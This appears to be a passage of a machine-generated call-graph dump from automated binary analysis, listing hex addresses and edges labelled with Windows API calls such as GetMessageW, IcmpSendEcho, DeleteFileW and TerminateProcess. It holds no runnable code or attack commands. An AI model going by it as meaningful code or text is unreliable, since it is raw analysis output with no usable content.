98299->98323 98302 31f1e8 98303 2f0fe6 Mailbox 59 API calls 98302->98303 98304 31f208 98303->98304 98306 2e1998 _memmove 98305->98306 98307 2e198f 98305->98307 98306->98241 98307->98306 98326 2e1aa4 98307->98326 98310 2e1aa4 59 API calls 98309->98310 98311 2e1614 98310->98311 98311->98242 98311->98261 98313 2e182d __NMSG_WRITE 98312->98313 98314 2e189a 98312->98314 98316 2e1868 98313->98316 98317 2e1843 98313->98317 98315 2e1981 59 API calls 98314->98315 98320 2e184b _memmove 98315->98320 98319 2e1c7e 59 API calls 98316->98319 98330 2e1b7c 59 API calls Mailbox 98317->98330 98319->98320 98320->98270 98321->98270 98322->98297 98324 2f0fe6 Mailbox 59 API calls 98323->98324 98325 2e1c88 98324->98325 98325->98302 98327 2e1ab7 98326->98327 98329 2e1ab4 _memmove 98326->98329 98328 2f0fe6 Mailbox 59 API calls 98327->98328 98328->98329 98329->98306 98330->98320 98332 2e1692 98331->98332 98334 2e16ba _memmove 98331->98334 98333 2f0fe6 Mailbox 59 API calls 98332->98333 98332->98334 98335 2e176f _memmove 98333->98335 98334->98280 98336 2f0fe6 Mailbox 59 API calls 98335->98336 98336->98335 98337->98281 98338->98045 98339->98027 98340->98033 98341->98046 98342->98050 98344 2e374f 98343->98344 98347 2e376a 98343->98347 98345 2e1aa4 59 API calls 98344->98345 98346 2e3757 CharUpperBuffW 98345->98346 98346->98347 98347->97925 98349 2d3aee 98348->98349 98350 30d3cd 98348->98350 98351 2f0fe6 Mailbox 59 API calls 98349->98351 98352 2d3af5 98351->98352 98353 2d3b16 98352->98353 98479 2d3ba5 59 API calls Mailbox 98352->98479 98353->97958 98356 31359f 98355->98356 98363 2dbc95 98355->98363 98552 33a48d 89 API calls 4 library calls 98356->98552 98358 2dbf3b 98358->97958 98362 2dc2b6 98362->98358 98364 2dc2c3 98362->98364 98429 2dbca5 Mailbox 98363->98429 98553 2d5376 60 API calls 98363->98553 98554 32700c 277 API calls 98363->98554 98550 2dc483 277 API calls Mailbox 98364->98550 98365 2dbf25 Mailbox 98365->98358 98549 2dc460 10 API calls Mailbox 98365->98549 98368 2dc2ca LockWindowUpdate DestroyWindow GetMessageW 98368->98358 98369 2dc2fc 98368->98369 98370 314509 TranslateMessage DispatchMessageW GetMessageW 98369->98370 98370->98370 98372 314539 98370->98372 98371 3136b3 Sleep 98371->98429 98372->98358 98373 2dbf54 timeGetTime 98373->98429 98375 31405d WaitForSingleObject 98379 31407d GetExitCodeProcess CloseHandle 98375->98379 98375->98429 98376 2e1c9c 59 API calls 98376->98429 98377 2e1207 59 API calls 98417 2dc1fa Mailbox 98377->98417 98378 2dc210 Sleep 98378->98417 98380 2dc36b 98379->98380 98380->97958 98381 2f0fe6 59 API calls Mailbox 98381->98429 98383 3143a9 Sleep 98383->98417 98384 2f0859 timeGetTime 98384->98417 98386 2dc324 timeGetTime 98551 2d5376 60 API calls 98386->98551 98387 334148 66 API calls 98387->98417 98389 314440 GetExitCodeProcess 98393 314456 WaitForSingleObject 98389->98393 98394 31446c CloseHandle 98389->98394 98390 2d4d37 84 API calls 98390->98429 98391 2d6d79 109 API calls 98391->98429 98393->98394 98393->98429 98394->98417 98395 356562 110 API calls 98395->98417 98397 3138aa Sleep 98397->98429 98398 3144c8 Sleep 98398->98429 98401 2e1a36 59 API calls 98401->98417 98403 2d5376 60 API calls 98403->98429 98405 2d3ea3 68 API calls 98405->98417 98406 2d53b0 255 API calls 98406->98429 98407 2dc26d 98412 2e1a36 59 API calls 98407->98412 98408 2db020 255 API calls 98408->98429 98410 2e1a36 59 API calls 98410->98429 98412->98365 98413 34c355 255 API calls 98413->98429 98415 33a48d 89 API calls 98415->98429 98416 2da820 255 API calls 98416->98429 98417->98377 98417->98378 98417->98380 98417->98384 98417->98387 98417->98389 98417->98395 98417->98397 98417->98398 98417->98401 98417->98405 98417->98429 98560 332baf 60 API calls 98417->98560 98561 2d5376 60 API calls 98417->98561 98562 2d6cd8 277 API calls 98417->98562 98563 3270e2 59 API calls 98417->98563 98564 3357ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98417->98564 98418 2d5190 59 API calls Mailbox 98418->98429 98419 2d6cd8 255 API calls 98419->98429 98420 326cf1 59 API calls Mailbox 98420->98429 98421 2d3a40 59 API calls 98421->98429 98422 2d39be 68 API calls 98422->98429 98423 313e13 VariantClear 98423->98429 98424 313ea9 VariantClear 98424->98429 98425 327aad 59 API calls 98425->98429 98426 313c57 VariantClear 98426->98429 98427 2d41c4 59 API calls Mailbox 98427->98429 98428 2d3ea3 68 API calls 98428->98429 98429->98365 98429->98371 98429->98373 98429->98375 98429->98376 98429->98378 98429->98380 98429->98381 98429->98383 98429->98386 98429->98390 98429->98391 98429->98403 98429->98406 98429->98407 98429->98408 98429->98410 98429->98413 98429->98415 98429->98416 98429->98417 98429->98418 98429->98419 98429->98420 98429->98421 98429->98422 98429->98423 98429->98424 98429->98425 98429->98426 98429->98427 98429->98428 98480 2d52b0 98429->98480 98489 2d9a00 98429->98489 98496 2d9c80 98429->98496 98528 34e60c 98429->98528 98531 34e620 98429->98531 98534 33c270 98429->98534 98541 34eedb 98429->98541 98555 356655 59 API calls 98429->98555 98556 33a058 59 API calls Mailbox 98429->98556 98557 32e0aa 59 API calls 98429->98557 98558 326c62 59 API calls 2 library calls 98429->98558 98559 2d38ff 59 API calls 98429->98559 98435 30d3b1 98434->98435 98439 2d3a53 98434->98439 98436 30d3c1 98435->98436 98903 326d17 59 API calls 98435->98903 98438 2d3a7d 98441 2d3a83 98438->98441 98442 2d3b31 59 API calls 98438->98442 98439->98438 98444 2d3a9a Mailbox 98439->98444 98894 2d3b31 98439->98894 98441->98444 98902 2d5190 59 API calls Mailbox 98441->98902 98442->98441 98444->97958 98445->97958 98446->97922 98447->97961 98448->97961 98449->97929 98450->97961 98451->97961 98452->97958 98453->97958 98454->97958 98455->97958 98905 2d3c30 98456->98905 98458 2d3eb3 98459 2d3f2d 98458->98459 98460 2d3ebd 98458->98460 98462 2d523c 59 API calls 98459->98462 98461 2f0fe6 Mailbox 59 API calls 98460->98461 98463 2d3ece 98461->98463 98471 2d3f1d 98462->98471 98464 2e1207 59 API calls 98463->98464 98466 2d3edc 98463->98466 98464->98466 98465 2d3eeb 98468 2f0fe6 Mailbox 59 API calls 98465->98468 98466->98465 98467 2e1bcc 59 API calls 98466->98467 98467->98465 98469 2d3ef5 98468->98469 98912 2d3bc8 68 API calls 98469->98912 98471->97958 98473 2d39c9 98472->98473 98474 2d3ea3 68 API calls 98473->98474 98475 2d39f0 98473->98475 98474->98475 98475->97951 98476->97961 98477->97958 98478->97961 98479->98353 98481 2d52c6 98480->98481 98485 2d5313 98480->98485 98482 2d52d3 PeekMessageW 98481->98482 98481->98485 98483 2d52ec 98482->98483 98482->98485 98483->98429 98485->98483 98486 2d533e PeekMessageW 98485->98486 98487 2d5352 TranslateMessage DispatchMessageW 98485->98487 98488 30df68 TranslateAcceleratorW 98485->98488 98565 2d359e 98485->98565 98486->98483 98486->98485 98487->98486 98488->98485 98488->98486 98490 2d9a1d 98489->98490 98491 2d9a31 98489->98491 98570 2d94e0 98490->98570 98604 33a48d 89 API calls 4 library calls 98491->98604 98493 2d9a28 98493->98429 98495 312478 98495->98495 98497 2d9cb5 98496->98497 98498 31247d 98497->98498 98501 2d9d1f 98497->98501 98511 2d9d79 98497->98511 98499 2d53b0 277 API calls 98498->98499 98500 312492 98499->98500 98523 2d9f50 Mailbox 98500->98523 98625 33a48d 89 API calls 4 library calls 98500->98625 98504 2e1207 59 API calls 98501->98504 98501->98511 98502 2e1207 59 API calls 98502->98511 98506 3124d8 98504->98506 98505 2f2f70 __cinit 67 API calls 98505->98511 98626 2f2f70 98506->98626 98507 31253c 98507->98429 98509 3124fa 98509->98429 98510 2d39be 68 API calls 98510->98523 98511->98502 98511->98505 98511->98507 98511->98509 98514 2d9f3a 98511->98514 98511->98523 98512 2d53b0 277 API calls 98512->98523 98514->98523 98629 33a48d 89 API calls 4 library calls 98514->98629 98518 2da775 98633 33a48d 89 API calls 4 library calls 98518->98633 98519 3127f9 98519->98429 98520 2d4230 59 API calls 98520->98523 98523->98510 98523->98512 98523->98518 98523->98520 98526 33a48d 89 API calls 98523->98526 98527 2da058 98523->98527 98621 2e1bcc 98523->98621 98630 327aad 59 API calls 98523->98630 98631 34ccac 277 API calls 98523->98631 98632 34bc26 277 API calls Mailbox 98523->98632 98634 2d5190 59 API calls Mailbox 98523->98634 98635 349ab0 277 API calls Mailbox 98523->98635 98526->98523 98527->98429 98674 34d1c6 98528->98674 98530 34e61c 98530->98429 98532 34d1c6 130 API calls 98531->98532 98533 34e630 98532->98533 98533->98429 98535 2d4d37 84 API calls 98534->98535 98536 33c286 98535->98536 98764 334005 98536->98764 98538 33c28e 98539 33c292 GetLastError 98538->98539 98540 33c2a7 98538->98540 98539->98540 98540->98429 98542 34ef1e 98541->98542 98548 34eef7 98541->98548 98543 34ef40 98542->98543 98852 2d502b 59 API calls 98542->98852 98546 34ef84 98543->98546 98543->98548 98853 2d502b 59 API calls 98543->98853 98819 336818 98546->98819 98548->98429 98549->98362 98550->98368 98551->98429 98552->98363 98553->98363 98554->98363 98555->98429 98556->98429 98557->98429 98558->98429 98559->98429 98560->98417 98561->98417 98562->98417 98563->98417 98564->98417 98566 2d35e2 98565->98566 98568 2d35b0 98565->98568 98566->98485 98567 2d35d5 IsDialogMessageW 98567->98566 98567->98568 98568->98566 98568->98567 98569 30d273 GetClassLongW 98568->98569 98569->98567 98569->98568 98571 2d53b0 277 API calls 98570->98571 98572 2d951f 98571->98572 98573 312001 98572->98573 98587 2d9527 _memmove 98572->98587 98613 2d5190 59 API calls Mailbox 98573->98613 98575 3122c0 98619 33a48d 89 API calls 4 library calls 98575->98619 98577 3122de 98577->98577 98578 2d9583 98578->98493 98579 2d9944 98584 2f0fe6 Mailbox 59 API calls 98579->98584 98580 2d986a 98582 3122b1 98580->98582 98583 2d987f 98580->98583 98581 2f0fe6 59 API calls Mailbox 98581->98587 98618 34a983 59 API calls 98582->98618 98585 2f0fe6 Mailbox 59 API calls 98583->98585 98597 2d96e3 _memmove 98584->98597 98596 2d977d 98585->98596 98587->98575 98587->98578 98587->98579 98587->98581 98588 2d96cf 98587->98588 98603 2d9741 98587->98603 98588->98579 98590 2d96dc 98588->98590 98589 2f0fe6 Mailbox 59 API calls 98591 2d970e 98589->98591 98593 2f0fe6 Mailbox 59 API calls 98590->98593 98591->98603 98605 2dcca0 98591->98605 98592 3122a0 98617 33a48d 89 API calls 4 library calls 98592->98617 98593->98597 98596->98493 98597->98589 98597->98591 98597->98603 98599 312278 98616 33a48d 89 API calls 4 library calls 98599->98616 98601 312253 98615 33a48d 89 API calls 4 library calls 98601->98615 98603->98580 98603->98592 98603->98596 98603->98599 98603->98601 98614 2d8180 277 API calls 98603->98614 98604->98495 98606 2dccda 98605->98606 98607 2dcd02 98605->98607 98608 2d9c80 277 API calls 98606->98608 98609 2dcce0 98606->98609 98607->98609 98610 314971 98607->98610 98611 2d53b0 277 API calls 98607->98611 98608->98609 98609->98603 98610->98609 98620 33a48d 89 API calls 4 library calls 98610->98620 98611->98610 98613->98579 98614->98603 98615->98596 98616->98596 98617->98596 98618->98575 98619->98577 98620->98609 98623 2e1bdc 98621->98623 98624 2e1bef _memmove 98621->98624 98622 2f0fe6 Mailbox 59 API calls 98622->98624 98623->98622 98623->98624 98624->98523 98625->98523 98636 2f2e74 98626->98636 98628 2f2f7b 98628->98511 98629->98523 98630->98523 98631->98523 98632->98523 98633->98519 98634->98523 98635->98523 98637 2f2e80 __lseeki64 98636->98637 98644 2f3447 98637->98644 98643 2f2ea7 __lseeki64 98643->98628 98661 2f9e3b 98644->98661 98646 2f2e89 98647 2f2eb8 DecodePointer DecodePointer 98646->98647 98648 2f2e95 98647->98648 98649 2f2ee5 98647->98649 98658 2f2eb2 98648->98658 98649->98648 98668 2f89d4 59 API calls __fptostr 98649->98668 98651 2f2f48 EncodePointer EncodePointer 98651->98648 98652 2f2ef7 98652->98651 98653 2f2f1c 98652->98653 98669 2f8a94 61 API calls 2 library calls 98652->98669 98653->98648 98656 2f2f36 EncodePointer 98653->98656 98670 2f8a94 61 API calls 2 library calls 98653->98670 98656->98651 98657 2f2f30 98657->98648 98657->98656 98671 2f3450 98658->98671 98662 2f9e5f EnterCriticalSection 98661->98662 98663 2f9e4c 98661->98663 98662->98646 98664 2f9ec3 __mtinitlocknum 57 API calls 98663->98664 98665 2f9e52 98664->98665 98665->98662 98666 2f32e5 _copy_environ 57 API calls 98665->98666 98667 2f9e5e 98666->98667 98667->98662 98668->98652 98669->98653 98670->98657 98672 2f9fa5 _doexit LeaveCriticalSection 98671->98672 98673 2f2eb7 98672->98673 98673->98643 98675 2d4d37 84 API calls 98674->98675 98676 34d203 98675->98676 98695 34d24a Mailbox 98676->98695 98712 34de8e 98676->98712 98678 34d4a2 98679 34d617 98678->98679 98683 34d4b0 98678->98683 98751 34dfb1 92 API calls Mailbox 98679->98751 98682 34d626 98682->98683 98684 34d632 98682->98684 98725 34d057 98683->98725 98684->98695 98685 2d4d37 84 API calls 98703 34d29b Mailbox 98685->98703 98690 34d4e9 98740 2f0e38 98690->98740 98693 34d503 98747 33a48d 89 API calls 4 library calls 98693->98747 98694 34d51c 98696 2d47be 59 API calls 98694->98696 98695->98530 98698 34d528 98696->98698 98700 2d4540 59 API calls 98698->98700 98699 34d50e GetCurrentProcess TerminateProcess 98699->98694 98701 34d53e 98700->98701 98711 34d565 98701->98711 98748 2d4230 59 API calls Mailbox 98701->98748 98703->98678 98703->98685 98703->98695 98745 33fc0d 59 API calls 2 library calls 98703->98745 98746 34d6c8 61 API calls 2 library calls 98703->98746 98704 34d68d 98704->98695 98708 34d6a1 FreeLibrary 98704->98708 98705 34d554 98749 34dd32 107 API calls _free 98705->98749 98708->98695 98710 2d523c 59 API calls 98710->98711 98711->98704 98711->98710 98750 2d4230 59 API calls Mailbox 98711->98750 98752 34dd32 107 API calls _free 98711->98752 98713 2e1aa4 59 API calls 98712->98713 98714 34dea9 CharLowerBuffW 98713->98714 98753 32f903 98714->98753 98718 2e1207 59 API calls 98719 34dee2 98718->98719 98720 2e1462 59 API calls 98719->98720 98722 34def9 98720->98722 98721 34df41 Mailbox 98721->98703 98723 2e1981 59 API calls 98722->98723 98724 34df05 Mailbox 98723->98724 98724->98721 98760 34d6c8 61 API calls 2 library calls 98724->98760 98726 34d072 98725->98726 98727 34d0c7 98725->98727 98728 2f0fe6 Mailbox 59 API calls 98726->98728 98731 34e139 98727->98731 98730 34d094 98728->98730 98729 2f0fe6 Mailbox 59 API calls 98729->98730 98730->98727 98730->98729 98732 34e362 Mailbox 98731->98732 98739 34e15c _strcat _wcscpy __NMSG_WRITE 98731->98739 98732->98690 98733 2d50d5 59 API calls 98733->98739 98734 2d502b 59 API calls 98734->98739 98735 2d5087 59 API calls 98735->98739 98736 2d4d37 84 API calls 98736->98739 98737 2f593c 58 API calls __crtGetStringTypeA_stat 98737->98739 98739->98732 98739->98733 98739->98734 98739->98735 98739->98736 98739->98737 98763 335e42 61 API calls 2 library calls 98739->98763 98742 2f0e4d 98740->98742 98741 2f0ee5 LoadLibraryExW 98744 2f0eb3 98741->98744 98742->98741 98743 2f0ed3 FindCloseChangeNotification 98742->98743 98742->98744 98743->98744 98744->98693 98744->98694 98745->98703 98746->98703 98747->98699 98748->98705 98749->98711 98750->98711 98751->98682 98752->98711 98755 32f92e __NMSG_WRITE 98753->98755 98754 32f96d 98754->98718 98754->98724 98755->98754 98758 32f963 98755->98758 98759 32fa14 98755->98759 98758->98754 98761 2e14db 61 API calls 98758->98761 98759->98754 98762 2e14db 61 API calls 98759->98762 98760->98721 98761->98758 98762->98759 98763->98739 98765 2e1207 59 API calls 98764->98765 98766 334024 98765->98766 98767 2e1207 59 API calls 98766->98767 98768 33402d 98767->98768 98769 2e1207 59 API calls 98768->98769 98770 334036 98769->98770 98789 2f0284 98770->98789 98775 33405c 98777 2f0119 59 API calls 98775->98777 98778 334070 FindFirstFileW 98777->98778 98779 33408f 98778->98779 98780 3340fc FindClose 98778->98780 98779->98780 98783 334093 98779->98783 98786 334107 Mailbox 98780->98786 98781 3340d7 FindNextFileW 98781->98779 98781->98783 98782 2e1c9c 59 API calls 98782->98783 98783->98779 98783->98781 98783->98782 98784 2e17e0 59 API calls 98783->98784 98785 2e1900 59 API calls 98783->98785 98784->98783 98787 3340c8 DeleteFileW 98785->98787 98786->98538 98787->98781 98788 3340f3 FindClose 98787->98788 98788->98786 98808 301b70 98789->98808 98792 2f02cd 98795 2e19e1 59 API calls 98792->98795 98793 2f02b0 98794 2e1821 59 API calls 98793->98794 98796 2f02bc 98794->98796 98795->98796 98810 2e133d 98796->98810 98799 334fec GetFileAttributesW 98800 33404a 98799->98800 98800->98775 98801 2e1900 98800->98801 98802 31f534 98801->98802 98803 2e1914 98801->98803 98805 2e1c7e 59 API calls 98802->98805 98814 2e18a5 98803->98814 98807 31f53f __NMSG_WRITE _memmove 98805->98807 98806 2e191f 98806->98775 98809 2f0291 GetFullPathNameW 98808->98809 98809->98792 98809->98793 98811 2e134b 98810->98811 98812 2e1981 59 API calls 98811->98812 98813 2e135b 98812->98813 98813->98799 98815 2e18b4 __NMSG_WRITE 98814->98815 98816 2e1c7e 59 API calls 98815->98816 98817 2e18c5 _memmove 98815->98817 98818 31f4f1 _memmove 98816->98818 98817->98806 98854 336735 98819->98854 98822 3368b1 98824 336921 98822->98824 98828 336917 98822->98828 98833 3368ca 98822->98833 98823 336899 98870 336a73 89 API calls 2 library calls 98823->98870 98826 336951 98824->98826 98827 33699f 98824->98827 98845 33683d _memmove 98824->98845 98831 336971 98826->98831 98832 336956 98826->98832 98829 3369a6 98827->98829 98830 336a3a 98827->98830 98828->98824 98834 3368fe 98828->98834 98835 3369a9 98829->98835 98836 336a1c 98829->98836 98830->98845 98879 2d50d5 59 API calls 98830->98879 98831->98845 98875 2d5087 59 API calls 98831->98875 98832->98845 98874 2d5087 59 API calls 98832->98874 98871 338cd0 61 API calls 98833->98871 98861 337c7f 98834->98861 98839 3369e5 98835->98839 98840 3369ad 98835->98840 98836->98845 98878 2d50d5 59 API calls 98836->98878 98839->98845 98877 2d50d5 59 API calls 98839->98877 98840->98845 98876 2d50d5 59 API calls 98840->98876 98845->98548 98847 3368d2 98872 338cd0 61 API calls 98847->98872 98850 3368e9 _memmove 98873 338cd0 61 API calls 98850->98873 98852->98543 98853->98546 98855 336785 98854->98855 98859 336746 98854->98859 98890 2d502b 59 API calls 98855->98890 98856 336783 98856->98822 98856->98823 98856->98845 98858 2d4d37 84 API calls 98858->98859 98859->98856 98859->98858 98880 2f312d 98859->98880 98862 337c8a 98861->98862 98863 2f0fe6 Mailbox 59 API calls 98862->98863 98864 337c91 98863->98864 98865 337cbe 98864->98865 98866 337c9d 98864->98866 98868 2f0fe6 Mailbox 59 API calls 98865->98868 98867 2f0fe6 Mailbox 59 API calls 98866->98867 98869 337ca6 _memset 98867->98869 98868->98869 98869->98845 98870->98845 98871->98847 98872->98850 98873->98834 98874->98845 98875->98845 98876->98845 98877->98845 98878->98845 98879->98845 98881 2f31ae 98880->98881 98882 2f3139 98880->98882 98893 2f31c0 60 API calls 3 library calls 98881->98893 98889 2f315e 98882->98889 98891 2f8d58 58 API calls __getptd_noexit 98882->98891 98885 2f31bb 98885->98859 98886 2f3145 98892 2f8fe6 9 API calls __fptostr 98886->98892 98888 2f3150 98888->98859 98889->98859 98890->98856 98891->98886 98892->98888 98893->98885 98895 2d3b3f 98894->98895 98901 2d3b67 98894->98901 98896 2d3b31 59 API calls 98895->98896 98897 2d3b4d 98895->98897 98896->98897 98898 2d3b53 98897->98898 98899 2d3b31 59 API calls 98897->98899 98898->98901 98904 2d5190 59 API calls Mailbox 98898->98904 98899->98898 98901->98438 98902->98444 98903->98436 98904->98901 98906 2d3e11 98905->98906 98907 2d3c43 98905->98907 98906->98458 98908 2e1207 59 API calls 98907->98908 98911 2d3c54 98907->98911 98909 2d3e73 98908->98909 98910 2f2f70 __cinit 67 API calls 98909->98910 98910->98911 98911->98458 98912->98471 98913->97970 98914->97967 98915->97863 98916->97862 98917->97859 98918->97862 98919->97858 98921 2f59b7 98920->98921 98926 2f5948 98920->98926 98946 2f35d1 DecodePointer 98921->98946 98923 2f59bd 98947 2f8d58 58 API calls __getptd_noexit 98923->98947 98924 2f5953 98924->98926 98940 2fa39b 58 API calls __NMSG_WRITE 98924->98940 98941 2fa3f8 58 API calls 6 library calls 98924->98941 98942 2f32cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98924->98942 98926->98924 98928 2f597b RtlAllocateHeap 98926->98928 98931 2f59a3 98926->98931 98935 2f59a1 98926->98935 98943 2f35d1 DecodePointer 98926->98943 98928->98926 98930 2f59af 98928->98930 98930->97866 98944 2f8d58 58 API calls __getptd_noexit 98931->98944 98945 2f8d58 58 API calls __getptd_noexit 98935->98945 98937->97866 98938->97871 98939->97873 98940->98924 98941->98924 98943->98926 98944->98935 98945->98930 98946->98923 98947->98930 98948 2d9a88 98951 2d86e0 98948->98951 98952 2d86fd 98951->98952 98953 310ff8 98952->98953 98954 310fad 98952->98954 98958 2d8724 98952->98958 98991 34aad0 277 API calls __cinit 98953->98991 98957 310fb5 98954->98957 98954->98958 98961 310fc2 98954->98961 98989 34b0e4 277 API calls 98957->98989 98960 2f2f70 __cinit 67 API calls 98958->98960 98965 3111af 98958->98965 98968 2d8a17 98958->98968 98969 2d39be 68 API calls 98958->98969 98973 2d523c 59 API calls 98958->98973 98974 2d3f42 68 API calls 98958->98974 98975 2d3c30 68 API calls 98958->98975 98976 2d898d 98958->98976 98977 2d53b0 277 API calls 98958->98977 98978 2e1c9c 59 API calls 98958->98978 98980 2d3938 68 API calls 98958->98980 98981 2d855e 277 API calls 98958->98981 98982 2d5278 98958->98982 98987 2d84e2 89 API calls 98958->98987 98988 2d835f 277 API calls 98958->98988 98992 3273ab 59 API calls 98958->98992 98960->98958 98961->98976 98990 34b58c 277 API calls 3 library calls 98961->98990 98963 311289 98963->98963 98993 34ae3b 89 API calls 98965->98993 98969->98958 98973->98958 98974->98958 98975->98958 98976->98968 98994 33a48d 89 API calls 4 library calls 98976->98994 98977->98958 98978->98958 98980->98958 98981->98958 98983 2f0fe6 Mailbox 59 API calls 98982->98983 98984 2d5285 98983->98984 98985 2d5294 98984->98985 98986 2e1a36 59 API calls 98984->98986 98985->98958 98986->98985 98987->98958 98988->98958 98989->98961 98990->98976 98991->98958 98992->98958 98993->98976 98994->98963 98995 2d9b8b 98996 2d86e0 277 API calls 98995->98996 98997 2d9b99 98996->98997 98998 30e438 99003 2d6152 Mailbox 98998->99003 99000 30efeb 99074 326cf1 59 API calls Mailbox 99000->99074 99002 30eff4 99003->99000 99003->99002 99005 30e2e9 VariantClear 99003->99005 99006 2d6af8 99003->99006 99008 34e60c 130 API calls 99003->99008 99013 345e1d 99003->99013 99038 2dcfd7 99003->99038 99057 34ebba 99003->99057 99063 34ec68 99003->99063 99071 2d5190 59 API calls Mailbox 99003->99071 99072 327aad 59 API calls 99003->99072 99005->99003 99073 33a48d 89 API calls 4 library calls 99006->99073 99008->99003 99014 345e46 99013->99014 99015 345e74 WSAStartup 99014->99015 99088 2d502b 59 API calls 99014->99088 99017 345e9d 99015->99017 99018 345e88 Mailbox 99015->99018 99075 2e40cd 99017->99075 99018->99003 99020 345e61 99020->99015 99089 2d502b 59 API calls 99020->99089 99022 2d4d37 84 API calls 99024 345eb2 99022->99024 99080 2e402a WideCharToMultiByte 99024->99080 99025 345e70 99025->99015 99027 345ebf inet_addr gethostbyname 99027->99018 99028 345edd IcmpCreateFile 99027->99028 99028->99018 99029 345f01 99028->99029 99030 2f0fe6 Mailbox 59 API calls 99029->99030 99031 345f1a 99030->99031 99032 2e433f 59 API calls 99031->99032 99033 345f25 99032->99033 99034 345f34 IcmpSendEcho 99033->99034 99035 345f55 IcmpSendEcho 99033->99035 99036 345f6d 99034->99036 99035->99036 99037 345fd4 IcmpCloseHandle WSACleanup 99036->99037 99037->99018 99039 2d4d37 84 API calls 99038->99039 99040 2dd001 99039->99040 99041 2d5278 59 API calls 99040->99041 99042 2dd018 99041->99042 99043 2dd57b 99042->99043 99053 2dd439 Mailbox __NMSG_WRITE 99042->99053 99107 2d502b 59 API calls 99042->99107 99043->99003 99045 2f312d _W_store_winword 60 API calls 99045->99053 99046 2e162d 59 API calls 99046->99053 99047 2f0c65 62 API calls 99047->99053 99049 2d4f98 59 API calls 99049->99053 99051 2d502b 59 API calls 99051->99053 99052 2d4d37 84 API calls 99052->99053 99053->99043 99053->99045 99053->99046 99053->99047 99053->99049 99053->99051 99053->99052 99054 2e1821 59 API calls 99053->99054 99092 2e59d3 99053->99092 99103 2e5ac3 99053->99103 99108 2e153b 59 API calls 2 library calls 99053->99108 99109 2d4f3c 59 API calls Mailbox 99053->99109 99054->99053 99060 34ebcd 99057->99060 99058 2d4d37 84 API calls 99059 34ec0a 99058->99059 99147 337ce4 99059->99147 99060->99058 99062 34ebdc 99060->99062 99062->99003 99064 34ecab 99063->99064 99070 34ec84 99063->99070 99065 34eccd 99064->99065 99191 2d502b 59 API calls 99064->99191 99068 34ed11 99065->99068 99065->99070 99192 2d502b 59 API calls 99065->99192 99188 3367fc 99068->99188 99070->99003 99071->99003 99072->99003 99073->99000 99074->99002 99076 2f0fe6 Mailbox 59 API calls 99075->99076 99077 2e40e0 99076->99077 99078 2e1c7e 59 API calls 99077->99078 99079 2e40ed 99078->99079 99079->99022 99081 2e404e 99080->99081 99082 2e4085 99080->99082 99084 2f0fe6 Mailbox 59 API calls 99081->99084 99091 2e3f20 59 API calls Mailbox 99082->99091 99085 2e4055 WideCharToMultiByte 99084->99085 99090 2e3f79 59 API calls 2 library calls 99085->99090 99087 2e4077 99087->99027 99088->99020 99089->99025 99090->99087 99091->99087 99093 2e59fe _memset 99092->99093 99110 2e5800 99093->99110 99096 2e5a83 99098 2e5a9d Shell_NotifyIconW 99096->99098 99099 2e5ab9 Shell_NotifyIconW 99096->99099 99100 2e5aab 99098->99100 99099->99100 99114 2e56f8 99100->99114 99102 2e5ab2 99102->99053 99104 2e5b25 99103->99104 99105 2e5ad5 _memset 99103->99105 99104->99053 99106 2e5af4 Shell_NotifyIconW 99105->99106 99106->99104 99107->99053 99108->99053 99109->99053 99111 2e581c 99110->99111 99112 2e5810 99110->99112 99111->99112 99113 2e5821 DestroyIcon 99111->99113 99112->99096 99144 3334dd 62 API calls _W_store_winword 99112->99144 99113->99112 99115 2e57fa Mailbox 99114->99115 99116 2e5715 99114->99116 99115->99102 99117 2e162d 59 API calls 99116->99117 99118 2e5723 99117->99118 99119 320c4c LoadStringW 99118->99119 99120 2e5730 99118->99120 99123 320c66 99119->99123 99121 2e1821 59 API calls 99120->99121 99122 2e5745 99121->99122 99124 2e5752 99122->99124 99130 320c74 99122->99130 99125 2e1c9c 59 API calls 99123->99125 99124->99123 99126 2e5760 99124->99126 99132 2e5778 _memset _wcscpy 99125->99132 99127 2e1900 59 API calls 99126->99127 99128 2e576a 99127->99128 99129 2e17e0 59 API calls 99128->99129 99129->99132 99131 320cb7 Mailbox 99130->99131 99130->99132 99133 2e1207 59 API calls 99130->99133 99146 2f38c8 83 API calls 3 library calls 99131->99146 99134 2e57e0 Shell_NotifyIconW 99132->99134 99135 320c9e 99133->99135 99134->99115 99145 330252 60 API calls Mailbox 99135->99145 99138 320ca9 99140 2e17e0 59 API calls 99138->99140 99139 320cd6 99141 2e1900 59 API calls 99139->99141 99140->99131 99142 320ce7 99141->99142 99143 2e1900 59 API calls 99142->99143 99143->99132 99144->99096 99145->99138 99146->99139 99148 337cf1 99147->99148 99149 2f0fe6 Mailbox 59 API calls 99148->99149 99150 337cf8 99149->99150 99153 336135 99150->99153 99152 337d3b Mailbox 99152->99062 99154 2e1aa4 59 API calls 99153->99154 99155 336148 CharLowerBuffW 99154->99155 99158 33615b 99155->99158 99156 2e1609 59 API calls 99156->99158 99157 336195 99159 3361a7 99157->99159 99160 2e1609 59 API calls 99157->99160 99158->99156 99158->99157 99170 336165 _memset Mailbox 99158->99170 99161 2f0fe6 Mailbox 59 API calls 99159->99161 99160->99159 99165 3361d5 99161->99165 99164 336233 99167 2f0fe6 Mailbox 59 API calls 99164->99167 99164->99170 99166 3361f4 99165->99166 99186 336071 59 API calls 99165->99186 99171 336292 99166->99171 99168 33624d 99167->99168 99169 2f0fe6 Mailbox 59 API calls 99168->99169 99169->99170 99170->99152 99172 2e1207 59 API calls 99171->99172 99173 3362c4 99172->99173 99174 2e1207 59 API calls 99173->99174 99175 3362cd 99174->99175 99176 2e1207 59 API calls 99175->99176 99183 3362d6 _wcscmp 99176->99183 99177 2e153b 59 API calls 99177->99183 99178 2e1821 59 API calls 99178->99183 99179 2f3836 GetStringTypeW 99179->99183 99181 2f37ba 59 API calls 99181->99183 99182 336292 60 API calls 99182->99183 99183->99177 99183->99178 99183->99179 99183->99181 99183->99182 99184 3365ab Mailbox 99183->99184 99185 2e1c9c 59 API calls 99183->99185 99187 2f385c GetStringTypeW _iswctype 99183->99187 99184->99164 99185->99183 99186->99165 99187->99183 99189 336818 92 API calls 99188->99189 99190 336813 99189->99190 99190->99070 99191->99065 99192->99068 99193 30dc5a 99194 2f0fe6 Mailbox 59 API calls 99193->99194 99195 30dc61 99194->99195 99196 2f0fe6 Mailbox 59 API calls 99195->99196 99198 30dc7a _memmove 99195->99198 99196->99198 99197 2f0fe6 Mailbox 59 API calls 99199 30dc9f 99197->99199 99198->99197 99200 2d1066 99205 2daaaa 